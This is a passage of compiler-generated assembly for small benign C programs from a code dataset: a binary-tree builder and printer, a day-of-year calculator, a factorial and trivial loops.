%rax movq 16(%rax), %rax movq %rax, -48(%rbp) jmp LBB6_7 LBB6_14: ## in Loop: Header=BB6_7 Depth=1 movq -48(%rbp), %rax cmpq $0, 24(%rax) jne LBB6_16 ## %bb.15: movl $32, %edi callq _malloc movq %rax, -64(%rbp) movl -20(%rbp), %ecx movq -64(%rbp), %rax movl %ecx, (%rax) movq -64(%rbp), %rax movq $0, 16(%rax) movq -64(%rbp), %rax movq $0, 24(%rax) movq -40(%rbp), %rcx movq -64(%rbp), %rax movq %rcx, 8(%rax) movq -64(%rbp), %rcx movq -40(%rbp), %rax movq %rcx, 24(%rax) movq -16(%rbp), %rax movl 8(%rax), %ecx addl $1, %ecx movl %ecx, 8(%rax) movl $0, -4(%rbp) jmp LBB6_19 LBB6_16: ## in Loop: Header=BB6_7 Depth=1 movq -48(%rbp), %rax movq 24(%rax), %rax movq %rax, -48(%rbp) jmp LBB6_7 LBB6_17: jmp LBB6_18 LBB6_18: movl $1, -4(%rbp) LBB6_19: movl -4(%rbp), %eax addq $64, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _printTree ## -- Begin function printTree .p2align 4, 0x90 _printTree: ## @printTree .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $48, %rsp movq %rdi, -8(%rbp) movq %rsi, -16(%rbp) movq -8(%rbp), %rax movq (%rax), %rax movq %rax, -24(%rbp) movl $0, -28(%rbp) movq -16(%rbp), %rdi movq -24(%rbp), %rsi callq _push_back LBB7_1: ## =>This Inner Loop Header: Depth=1 movq -16(%rbp), %rdi callq _listEmpty cmpl $0, %eax setne %al xorb $-1, %al testb $1, %al jne LBB7_2 jmp LBB7_10 LBB7_2: ## in Loop: Header=BB7_1 Depth=1 movq -16(%rbp), %rdi callq _removeFirst movq %rax, -40(%rbp) movl -28(%rbp), %eax addl $1, %eax movl %eax, -28(%rbp) movl -28(%rbp), %eax movq -8(%rbp), %rcx cmpl 8(%rcx), %eax je LBB7_4 ## %bb.3: ## in Loop: Header=BB7_1 Depth=1 movq -40(%rbp), %rax movl (%rax), %esi leaq L_.str(%rip), %rdi movb $0, %al callq _printf jmp LBB7_5 LBB7_4: ## in Loop: Header=BB7_1 Depth=1 movq -40(%rbp), %rax movl (%rax), %esi leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf LBB7_5: ## in Loop: Header=BB7_1 Depth=1 movq -40(%rbp), %rax cmpq $0, 16(%rax) je LBB7_7 ## %bb.6: ## in Loop: Header=BB7_1 Depth=1 movq -16(%rbp), %rdi movq -40(%rbp), %rax movq 16(%rax), %rsi callq _push_back LBB7_7: ## in Loop: Header=BB7_1 Depth=1 movq -40(%rbp), %rax cmpq $0, 24(%rax) je LBB7_9 ## %bb.8: ## in Loop: Header=BB7_1 Depth=1 movq -16(%rbp), %rdi movq -40(%rbp), %rax movq 24(%rax), %rsi callq _push_back LBB7_9: ## in Loop: Header=BB7_1 Depth=1 jmp LBB7_1 LBB7_10: addq $48, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movl $0, -4(%rbp) movl $16, %edi callq _malloc movq %rax, -16(%rbp) movl $16, %edi callq _malloc movq %rax, -24(%rbp) movq -16(%rbp), %rdi callq _init movq -24(%rbp), %rdi callq _listInit movl $0, -28(%rbp) LBB8_1: ## =>This Inner Loop Header: Depth=1 cmpl $7, -28(%rbp) jge LBB8_4 ## %bb.2: ## in Loop: Header=BB8_1 Depth=1 leaq L_.str.2(%rip), %rdi leaq -32(%rbp), %rsi movb $0, %al callq _scanf movq -16(%rbp), %rdi movl -32(%rbp), %esi callq _insert ## %bb.3: ## in Loop: Header=BB8_1 Depth=1 movl -28(%rbp), %eax addl $1, %eax movl %eax, -28(%rbp) jmp LBB8_1 LBB8_4: movq -16(%rbp), %rdi movq -24(%rbp), %rsi callq _printTree movl -4(%rbp), %eax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "%d " L_.str.1: ## @.str.1 .asciz "%d\n" L_.str.2: ## @.str.2 .asciz "%d" .subsections_via_symbols
the_stack_data/849667.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .subsections_via_symbols
the_stack_data/12638118.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 str wzr, [sp, #28] str wzr, [sp, #24] mov w8, #42 str w8, [sp, #20] mov w8, #90 str w8, [sp, #16] mov w8, #1 str w8, [sp, #12] str wzr, [sp, #8] ldr w8, [sp, #8] subs w8, w8, #100 cset w8, ge tbnz w8, #0, LBB0_7 b LBB0_1 LBB0_1: ldr w8, [sp, #20] str w8, [sp, #24] ldr w8, [sp, #16] str w8, [sp, #20] mov w8, #90 str w8, [sp, #16] mov w8, #10 str w8, [sp, #24] ldr w8, [sp, #8] ldr w9, [sp, #12] add w8, w8, w9 str w8, [sp, #12] ldr w8, [sp, #12] subs w8, w8, #100 cset w8, ge tbnz w8, #0, LBB0_3 b LBB0_2 LBB0_2: mov w8, #10 str w8, [sp, #24] ldr w8, [sp, #8] ldr w9, [sp, #12] add w8, w8, w9 str w8, [sp, #12] b LBB0_3 LBB0_3: b LBB0_4 LBB0_4: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #12] subs w8, w8, #100 cset w8, ge tbnz w8, #0, LBB0_6 b LBB0_5 LBB0_5: ; in Loop: Header=BB0_4 Depth=1 ldr w8, [sp, #8] ldr w9, [sp, #12] add w8, w8, w9 str w8, [sp, #12] b LBB0_4 LBB0_6: ldr w8, [sp, #8] add w8, w8, #1 str w8, [sp, #8] b LBB0_7 LBB0_7: ldr w8, [sp, #8] subs w8, w8, #100 cset w8, ge tbnz w8, #0, LBB0_14 b LBB0_8 LBB0_8: ldr w8, [sp, #20] str w8, [sp, #24] ldr w8, [sp, #16] str w8, [sp, #20] ldr w8, [sp, #8] ldr w9, [sp, #12] add w8, w8, w9 str w8, [sp, #12] ldr w8, [sp, #12] subs w8, w8, #100 cset w8, ge tbnz w8, #0, LBB0_10 b LBB0_9 LBB0_9: mov w8, #10 str w8, [sp, #24] ldr w8, [sp, #8] ldr w9, [sp, #12] add w8, w8, w9 str w8, [sp, #12] b LBB0_10 LBB0_10: b LBB0_11 LBB0_11: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #12] subs w8, w8, #100 cset w8, ge tbnz w8, #0, LBB0_13 b LBB0_12 LBB0_12: ; in Loop: Header=BB0_11 Depth=1 ldr w8, [sp, #8] ldr w9, [sp, #12] add w8, w8, w9 str w8, [sp, #12] b LBB0_11 LBB0_13: ldr w8, [sp, #8] add w8, w8, #1 str w8, [sp, #8] b LBB0_14 LBB0_14: ldr w8, [sp, #8] subs w8, w8, #100 cset w8, ge tbnz w8, #0, LBB0_21 b LBB0_15 LBB0_15: ldr w8, [sp, #20] str w8, [sp, #24] ldr w8, [sp, #8] ldr w9, [sp, #12] add w8, w8, w9 str w8, [sp, #12] ldr w8, [sp, #12] subs w8, w8, #100 cset w8, ge tbnz w8, #0, LBB0_17 b LBB0_16 LBB0_16: mov w8, #10 str w8, [sp, #24] ldr w8, [sp, #8] ldr w9, [sp, #12] add w8, w8, w9 str w8, [sp, #12] b LBB0_17 LBB0_17: b LBB0_18 LBB0_18: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #12] subs w8, w8, #100 cset w8, ge tbnz w8, #0, LBB0_20 b LBB0_19 LBB0_19: ; in Loop: Header=BB0_18 Depth=1 ldr w8, [sp, #8] ldr w9, [sp, #12] add w8, w8, w9 str w8, [sp, #12] b LBB0_18 LBB0_20: ldr w8, [sp, #8] add w8, w8, #1 str w8, [sp, #8] b LBB0_21 LBB0_21: b LBB0_22 LBB0_22: ; =>This Loop Header: Depth=1 ; Child Loop BB0_26 Depth 2 ldr w8, [sp, #8] subs w8, w8, #100 cset w8, ge tbnz w8, #0, LBB0_29 b LBB0_23 LBB0_23: ; in Loop: Header=BB0_22 Depth=1 ldr w8, [sp, #8] ldr w9, [sp, #12] add w8, w8, w9 str w8, [sp, #12] ldr w8, [sp, #12] subs w8, w8, #100 cset w8, ge tbnz w8, #0, LBB0_25 b LBB0_24 LBB0_24: ; in Loop: Header=BB0_22 Depth=1 mov w8, #10 str w8, [sp, #24] ldr w8, [sp, #8] ldr w9, [sp, #12] add w8, w8, w9 str w8, [sp, #12] b LBB0_25 LBB0_25: ; in Loop: Header=BB0_22 Depth=1 b LBB0_26 LBB0_26: ; Parent Loop BB0_22 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #12] subs w8, w8, #100 cset w8, ge tbnz w8, #0, LBB0_28 b LBB0_27 LBB0_27: ; in Loop: Header=BB0_26 Depth=2 ldr w8, [sp, #8] ldr w9, [sp, #12] add w8, w8, w9 str w8, [sp, #12] b LBB0_26 LBB0_28: ; in Loop: Header=BB0_22 Depth=1 ldr w8, [sp, #8] add w8, w8, #1 str w8, [sp, #8] b LBB0_22 LBB0_29: ldr w0, [sp, #28] add sp, sp, #32 ret .cfi_endproc ; -- End function .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl $0, -4(%rbp) movl $0, -8(%rbp) movl $42, -12(%rbp) movl $90, -16(%rbp) movl $1, -20(%rbp) movl $0, -24(%rbp) cmpl $100, -24(%rbp) jge LBB0_7 ## %bb.1: movl -12(%rbp), %eax movl %eax, -8(%rbp) movl -16(%rbp), %eax movl %eax, -12(%rbp) movl $90, -16(%rbp) movl $10, -8(%rbp) movl -24(%rbp), %eax addl -20(%rbp), %eax movl %eax, -20(%rbp) cmpl $100, -20(%rbp) jge LBB0_3 ## %bb.2: movl $10, -8(%rbp) movl -24(%rbp), %eax addl -20(%rbp), %eax movl %eax, -20(%rbp) LBB0_3: jmp LBB0_4 LBB0_4: ## =>This Inner Loop Header: Depth=1 cmpl $100, -20(%rbp) jge LBB0_6 ## %bb.5: ## in Loop: Header=BB0_4 Depth=1 movl -24(%rbp), %eax addl -20(%rbp), %eax movl %eax, -20(%rbp) jmp LBB0_4 LBB0_6: movl -24(%rbp), %eax addl $1, %eax movl %eax, -24(%rbp) LBB0_7: cmpl $100, -24(%rbp) jge LBB0_14 ## %bb.8: movl -12(%rbp), %eax movl %eax, -8(%rbp) movl -16(%rbp), %eax movl %eax, -12(%rbp) movl -24(%rbp), %eax addl -20(%rbp), %eax movl %eax, -20(%rbp) cmpl $100, -20(%rbp) jge LBB0_10 ## %bb.9: movl $10, -8(%rbp) movl -24(%rbp), %eax addl -20(%rbp), %eax movl %eax, -20(%rbp) LBB0_10: jmp LBB0_11 LBB0_11: ## =>This Inner Loop Header: Depth=1 cmpl $100, -20(%rbp) jge LBB0_13 ## %bb.12: ## in Loop: Header=BB0_11 Depth=1 movl -24(%rbp), %eax addl -20(%rbp), %eax movl %eax, -20(%rbp) jmp LBB0_11 LBB0_13: movl -24(%rbp), %eax addl $1, %eax movl %eax, -24(%rbp) LBB0_14: cmpl $100, -24(%rbp) jge LBB0_21 ## %bb.15: movl -12(%rbp), %eax movl %eax, -8(%rbp) movl -24(%rbp), %eax addl -20(%rbp), %eax movl %eax, -20(%rbp) cmpl $100, -20(%rbp) jge LBB0_17 ## %bb.16: movl $10, -8(%rbp) movl -24(%rbp), %eax addl -20(%rbp), %eax movl %eax, -20(%rbp) LBB0_17: jmp LBB0_18 LBB0_18: ## =>This Inner Loop Header: Depth=1 cmpl $100, -20(%rbp) jge LBB0_20 ## %bb.19: ## in Loop: Header=BB0_18 Depth=1 movl -24(%rbp), %eax addl -20(%rbp), %eax movl %eax, -20(%rbp) jmp LBB0_18 LBB0_20: movl -24(%rbp), %eax addl $1, %eax movl %eax, -24(%rbp) LBB0_21: jmp LBB0_22 LBB0_22: ## =>This Loop Header: Depth=1 ## Child Loop BB0_26 Depth 2 cmpl $100, -24(%rbp) jge LBB0_29 ## %bb.23: ## in Loop: Header=BB0_22 Depth=1 movl -24(%rbp), %eax addl -20(%rbp), %eax movl %eax, -20(%rbp) cmpl $100, -20(%rbp) jge LBB0_25 ## %bb.24: ## in Loop: Header=BB0_22 Depth=1 movl $10, -8(%rbp) movl -24(%rbp), %eax addl -20(%rbp), %eax movl %eax, -20(%rbp) LBB0_25: ## in Loop: Header=BB0_22 Depth=1 jmp LBB0_26 LBB0_26: ## Parent Loop BB0_22 Depth=1 ## => This Inner Loop Header: Depth=2 cmpl $100, -20(%rbp) jge LBB0_28 ## %bb.27: ## in Loop: Header=BB0_26 Depth=2 movl -24(%rbp), %eax addl -20(%rbp), %eax movl %eax, -20(%rbp) jmp LBB0_26 LBB0_28: ## in Loop: Header=BB0_22 Depth=1 movl -24(%rbp), %eax addl $1, %eax movl %eax, -24(%rbp) jmp LBB0_22 LBB0_29: movl -4(%rbp), %eax popq %rbp retq .cfi_endproc ## -- End function .subsections_via_symbols
the_stack_data/25139209.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 mov w0, #0 add sp, sp, #16 ret .cfi_endproc ; -- End function .comm _x,4,2 ; @x .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp xorl %eax, %eax popq %rbp retq .cfi_endproc ## -- End function .comm _x,4,2 ## @x .subsections_via_symbols
the_stack_data/181392830.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #96 .cfi_def_cfa_offset 96 stp x29, x30, [sp, #80] ; 16-byte Folded Spill add x29, sp, #80 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur wzr, [x29, #-4] stur wzr, [x29, #-20] b LBB0_1 LBB0_1: ; =>This Inner Loop Header: Depth=1 adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf mov x9, sp sub x8, x29, #8 str x8, [x9] sub x8, x29, #12 str x8, [x9, #8] sub x8, x29, #16 str x8, [x9, #16] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _scanf b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 ldur w8, [x29, #-8] subs w8, w8, #0 cset w8, le mov w9, #0 stur w9, [x29, #-28] ; 4-byte Folded Spill tbnz w8, #0, LBB0_8 b LBB0_3 LBB0_3: ; in Loop: Header=BB0_1 Depth=1 ldur w8, [x29, #-12] subs w8, w8, #0 cset w8, le mov w9, #0 stur w9, [x29, #-28] ; 4-byte Folded Spill tbnz w8, #0, LBB0_8 b LBB0_4 LBB0_4: ; in Loop: Header=BB0_1 Depth=1 ldur w8, [x29, #-12] subs w8, w8, #12 cset w8, gt mov w9, #0 stur w9, [x29, #-28] ; 4-byte Folded Spill tbnz w8, #0, LBB0_8 b LBB0_5 LBB0_5: ; in Loop: Header=BB0_1 Depth=1 ldur w8, [x29, #-16] subs w8, w8, #0 cset w8, le mov w9, #0 stur w9, [x29, #-32] ; 4-byte Folded Spill tbnz w8, #0, LBB0_7 b LBB0_6 LBB0_6: ; in Loop: Header=BB0_1 Depth=1 ldur w8, [x29, #-16] subs w8, w8, #31 cset w8, le stur w8, [x29, #-32] ; 4-byte Folded Spill b LBB0_7 LBB0_7: ; in Loop: Header=BB0_1 Depth=1 ldur w8, [x29, #-32] ; 4-byte Folded Reload stur w8, [x29, #-28] ; 4-byte Folded Spill b LBB0_8 LBB0_8: ; in Loop: Header=BB0_1 Depth=1 ldur w8, [x29, #-28] ; 4-byte Folded Reload tbz w8, #0, LBB0_1 b LBB0_9 LBB0_9: ldur w8, [x29, #-16] stur w8, [x29, #-20] mov w8, #1 stur w8, [x29, #-24] b LBB0_10 LBB0_10: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-24] ldur w9, [x29, #-12] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB0_31 b LBB0_11 LBB0_11: ; in Loop: Header=BB0_10 Depth=1 ldur w8, [x29, #-24] subs w8, w8, #1 cset w8, eq tbnz w8, #0, LBB0_18 b LBB0_12 LBB0_12: ; in Loop: Header=BB0_10 Depth=1 ldur w8, [x29, #-24] subs w8, w8, #3 cset w8, eq tbnz w8, #0, LBB0_18 b LBB0_13 LBB0_13: ; in Loop: Header=BB0_10 Depth=1 ldur w8, [x29, #-24] subs w8, w8, #5 cset w8, eq tbnz w8, #0, LBB0_18 b LBB0_14 LBB0_14: ; in Loop: Header=BB0_10 Depth=1 ldur w8, [x29, #-24] subs w8, w8, #7 cset w8, eq tbnz w8, #0, LBB0_18 b LBB0_15 LBB0_15: ; in Loop: Header=BB0_10 Depth=1 ldur w8, [x29, #-24] subs w8, w8, #8 cset w8, eq tbnz w8, #0, LBB0_18 b LBB0_16 LBB0_16: ; in Loop: Header=BB0_10 Depth=1 ldur w8, [x29, #-24] subs w8, w8, #10 cset w8, eq tbnz w8, #0, LBB0_18 b LBB0_17 LBB0_17: ; in Loop: Header=BB0_10 Depth=1 ldur w8, [x29, #-24] subs w8, w8, #12 cset w8, ne tbnz w8, #0, LBB0_19 b LBB0_18 LBB0_18: ; in Loop: Header=BB0_10 Depth=1 ldur w8, [x29, #-20] add w8, w8, #31 stur w8, [x29, #-20] b LBB0_29 LBB0_19: ; in Loop: Header=BB0_10 Depth=1 ldur w8, [x29, #-24] subs w8, w8, #4 cset w8, eq tbnz w8, #0, LBB0_23 b LBB0_20 LBB0_20: ; in Loop: Header=BB0_10 Depth=1 ldur w8, [x29, #-24] subs w8, w8, #6 cset w8, eq tbnz w8, #0, LBB0_23 b LBB0_21 LBB0_21: ; in Loop: Header=BB0_10 Depth=1 ldur w8, [x29, #-24] subs w8, w8, #9 cset w8, eq tbnz w8, #0, LBB0_23 b LBB0_22 LBB0_22: ; in Loop: Header=BB0_10 Depth=1 ldur w8, [x29, #-24] subs w8, w8, #11 cset w8, ne tbnz w8, #0, LBB0_24 b LBB0_23 LBB0_23: ; in Loop: Header=BB0_10 Depth=1 ldur w8, [x29, #-20] add w8, w8, #30 stur w8, [x29, #-20] b LBB0_28 LBB0_24: ; in Loop: Header=BB0_10 Depth=1 ldur w8, [x29, #-8] mov w10, #4 sdiv w9, w8, w10 mul w9, w9, w10 subs w8, w8, w9 subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB0_26 b LBB0_25 LBB0_25: ; in Loop: Header=BB0_10 Depth=1 ldur w8, [x29, #-8] mov w10, #100 sdiv w9, w8, w10 mul w9, w9, w10 subs w8, w8, w9 subs w8, w8, #0 cset w8, ne mov w9, #1 stur w9, [x29, #-36] ; 4-byte Folded Spill tbnz w8, #0, LBB0_27 b LBB0_26 LBB0_26: ; in Loop: Header=BB0_10 Depth=1 ldur w8, [x29, #-8] mov w10, #400 sdiv w9, w8, w10 mul w9, w9, w10 subs w8, w8, w9 subs w8, w8, #0 cset w8, eq stur w8, [x29, #-36] ; 4-byte Folded Spill b LBB0_27 LBB0_27: ; in Loop: Header=BB0_10 Depth=1 ldur w8, [x29, #-36] ; 4-byte Folded Reload and w10, w8, #0x1 mov w9, #28 mov w8, #29 ands w10, w10, #0x1 csel w9, w8, w9, ne ldur w8, [x29, #-20] add w8, w8, w9 stur w8, [x29, #-20] b LBB0_28 LBB0_28: ; in Loop: Header=BB0_10 Depth=1 b LBB0_29 LBB0_29: ; in Loop: Header=BB0_10 Depth=1 b LBB0_30 LBB0_30: ; in Loop: Header=BB0_10 Depth=1 ldur w8, [x29, #-24] add w8, w8, #1 stur w8, [x29, #-24] b LBB0_10 LBB0_31: ldur w8, [x29, #-8] ; implicit-def: $x12 mov x12, x8 ldur w8, [x29, #-12] ; implicit-def: $x11 mov x11, x8 ldur w8, [x29, #-16] ; implicit-def: $x10 mov x10, x8 ldur w9, [x29, #-20] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x12, [x9] str x11, [x9, #8] str x10, [x9, #16] str x8, [x9, #24] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf mov w0, #0 ldp x29, x30, [sp, #80] ; 16-byte Folded Reload add sp, sp, #96 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "\350\257\267\350\276\223\345\205\245\346\227\245\346\234\237(y/m/d):" l_.str.1: ; @.str.1 .asciz "%d/%d/%d" l_.str.2: ; @.str.2 .asciz "%d/%d/%d\346\230\257\350\277\231\344\270\200\345\271\264\347\232\204\347\254\254%d\345\244\251\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movl $0, -4(%rbp) movl $0, -20(%rbp) LBB0_1: ## =>This Inner Loop Header: Depth=1 leaq L_.str(%rip), %rdi movb $0, %al callq _printf leaq L_.str.1(%rip), %rdi leaq -8(%rbp), %rsi leaq -12(%rbp), %rdx leaq -16(%rbp), %rcx movb $0, %al callq _scanf ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl $0, -8(%rbp) movb %al, -25(%rbp) ## 1-byte Spill jle LBB0_8 ## %bb.3: ## in Loop: Header=BB0_1 Depth=1 xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl $0, -12(%rbp) movb %al, -25(%rbp) ## 1-byte Spill jle LBB0_8 ## %bb.4: ## in Loop: Header=BB0_1 Depth=1 xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl $12, -12(%rbp) movb %al, -25(%rbp) ## 1-byte Spill jg LBB0_8 ## %bb.5: ## in Loop: Header=BB0_1 Depth=1 xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl $0, -16(%rbp) movb %al, -26(%rbp) ## 1-byte Spill jle LBB0_7 ## %bb.6: ## in Loop: Header=BB0_1 Depth=1 cmpl $31, -16(%rbp) setle %al movb %al, -26(%rbp) ## 1-byte Spill LBB0_7: ## in Loop: Header=BB0_1 Depth=1 movb -26(%rbp), %al ## 1-byte Reload movb %al, -25(%rbp) ## 1-byte Spill LBB0_8: ## in Loop: Header=BB0_1 Depth=1 movb -25(%rbp), %al ## 1-byte Reload xorb $-1, %al testb $1, %al jne LBB0_1 ## %bb.9: movl -16(%rbp), %eax movl %eax, -20(%rbp) movl $1, -24(%rbp) LBB0_10: ## =>This Inner Loop Header: Depth=1 movl -24(%rbp), %eax cmpl -12(%rbp), %eax jge LBB0_31 ## %bb.11: ## in Loop: Header=BB0_10 Depth=1 cmpl $1, -24(%rbp) je LBB0_18 ## %bb.12: ## in Loop: Header=BB0_10 Depth=1 cmpl $3, -24(%rbp) je LBB0_18 ## %bb.13: ## in Loop: Header=BB0_10 Depth=1 cmpl $5, -24(%rbp) je LBB0_18 ## %bb.14: ## in Loop: Header=BB0_10 Depth=1 cmpl $7, -24(%rbp) je LBB0_18 ## %bb.15: ## in Loop: Header=BB0_10 Depth=1 cmpl $8, -24(%rbp) je LBB0_18 ## %bb.16: ## in Loop: Header=BB0_10 Depth=1 cmpl $10, -24(%rbp) je LBB0_18 ## %bb.17: ## in Loop: Header=BB0_10 Depth=1 cmpl $12, -24(%rbp) jne LBB0_19 LBB0_18: ## in Loop: Header=BB0_10 Depth=1 movl -20(%rbp), %eax addl $31, %eax movl %eax, -20(%rbp) jmp LBB0_29 LBB0_19: ## in Loop: Header=BB0_10 Depth=1 cmpl $4, -24(%rbp) je LBB0_23 ## %bb.20: ## in Loop: Header=BB0_10 Depth=1 cmpl $6, -24(%rbp) je LBB0_23 ## %bb.21: ## in Loop: Header=BB0_10 Depth=1 cmpl $9, -24(%rbp) je LBB0_23 ## %bb.22: ## in Loop: Header=BB0_10 Depth=1 cmpl $11, -24(%rbp) jne LBB0_24 LBB0_23: ## in Loop: Header=BB0_10 Depth=1 movl -20(%rbp), %eax addl $30, %eax movl %eax, -20(%rbp) jmp LBB0_28 LBB0_24: ## in Loop: Header=BB0_10 Depth=1 movl -8(%rbp), %eax movl $4, %ecx cltd idivl %ecx cmpl $0, %edx jne LBB0_26 ## %bb.25: ## in Loop: Header=BB0_10 Depth=1 movl -8(%rbp), %eax movl $100, %ecx cltd idivl %ecx movb $1, %al cmpl $0, %edx movb %al, -27(%rbp) ## 1-byte Spill jne LBB0_27 LBB0_26: ## in Loop: Header=BB0_10 Depth=1 movl -8(%rbp), %eax movl $400, %ecx ## imm = 0x190 cltd idivl %ecx cmpl $0, %edx sete %al movb %al, -27(%rbp) ## 1-byte Spill LBB0_27: ## in Loop: Header=BB0_10 Depth=1 movb -27(%rbp), %dl ## 1-byte Reload movl $28, %eax movl $29, %ecx testb $1, %dl cmovnel %ecx, %eax addl -20(%rbp), %eax movl %eax, -20(%rbp) LBB0_28: ## in Loop: Header=BB0_10 Depth=1 jmp LBB0_29 LBB0_29: ## in Loop: Header=BB0_10 Depth=1 jmp LBB0_30 LBB0_30: ## in Loop: Header=BB0_10 Depth=1 movl -24(%rbp), %eax addl $1, %eax movl %eax, -24(%rbp) jmp LBB0_10 LBB0_31: movl -8(%rbp), %esi movl -12(%rbp), %edx movl -16(%rbp), %ecx movl -20(%rbp), %r8d leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf xorl %eax, %eax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "\350\257\267\350\276\223\345\205\245\346\227\245\346\234\237(y/m/d):" L_.str.1: ## @.str.1 .asciz "%d/%d/%d" L_.str.2: ## @.str.2 .asciz "%d/%d/%d\346\230\257\350\277\231\344\270\200\345\271\264\347\232\204\347\254\254%d\345\244\251\n" .subsections_via_symbols
the_stack_data/764260.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _fac ; -- Begin function fac .p2align 2 _fac: ; @fac .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 str w0, [sp, #8] ldr w8, [sp, #8] subs w8, w8, #0 cset w8, ge tbnz w8, #0, LBB0_2 b LBB0_1 LBB0_1: str wzr, [sp, #12] b LBB0_6 LBB0_2: str wzr, [sp, #4] mov w8, #1 str w8, [sp] b LBB0_3 LBB0_3: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #4] ldr w9, [sp, #8] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB0_5 b LBB0_4 LBB0_4: ; in Loop: Header=BB0_3 Depth=1 ldr w8, [sp, #4] add w8, w8, #1 str w8, [sp, #4] ldr w8, [sp] ldr w9, [sp, #4] mul w8, w8, w9 str w8, [sp] b LBB0_3 LBB0_5: ldr w8, [sp] str w8, [sp, #12] b LBB0_6 LBB0_6: ldr w0, [sp, #12] add sp, sp, #16 ret .cfi_endproc ; -- End function .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur wzr, [x29, #-4] mov w0, #5 bl _fac ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _fac ## -- Begin function fac .p2align 4, 0x90 _fac: ## @fac .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl %edi, -8(%rbp) cmpl $0, -8(%rbp) jge LBB0_2 ## %bb.1: movl $0, -4(%rbp) jmp LBB0_6 LBB0_2: movl $0, -12(%rbp) movl $1, -16(%rbp) LBB0_3: ## =>This Inner Loop Header: Depth=1 movl -12(%rbp), %eax cmpl -8(%rbp), %eax jge LBB0_5 ## %bb.4: ## in Loop: Header=BB0_3 Depth=1 movl -12(%rbp), %eax addl $1, %eax movl %eax, -12(%rbp) movl -16(%rbp), %eax imull -12(%rbp), %eax movl %eax, -16(%rbp) jmp LBB0_3 LBB0_5: movl -16(%rbp), %eax movl %eax, -4(%rbp) LBB0_6: movl -4(%rbp), %eax popq %rbp retq .cfi_endproc ## -- End function .globl _main ## -- Begin function main .p2align 4, 0x90 _main: 